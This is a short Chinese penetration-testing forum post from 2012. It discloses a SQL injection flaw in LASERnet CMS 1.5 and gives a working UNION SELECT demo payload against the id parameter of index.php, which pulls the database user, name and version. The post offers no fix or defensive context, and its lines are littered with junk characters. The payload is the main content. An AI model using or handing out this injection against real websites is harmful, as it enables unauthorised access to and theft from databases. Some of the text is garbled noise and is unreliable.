中国网络渗透测试联盟

标题: LASERnet CMS Version 1.5 SQL注入漏洞 [打印本页]
作者: admin    时间: 2012-9-10 20:47
标题: LASERnet CMS Version 1.5 SQL注入漏洞
利用方法:  n+ i, n3 a. i. \  Z" h; W8 d! q" [
http://www.xxx.com/index.php?id=[SQL]8 H, q) u2 L+ P2 A$ T, }1 v
Demo:
. n9 k( h$ P* _% Y http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2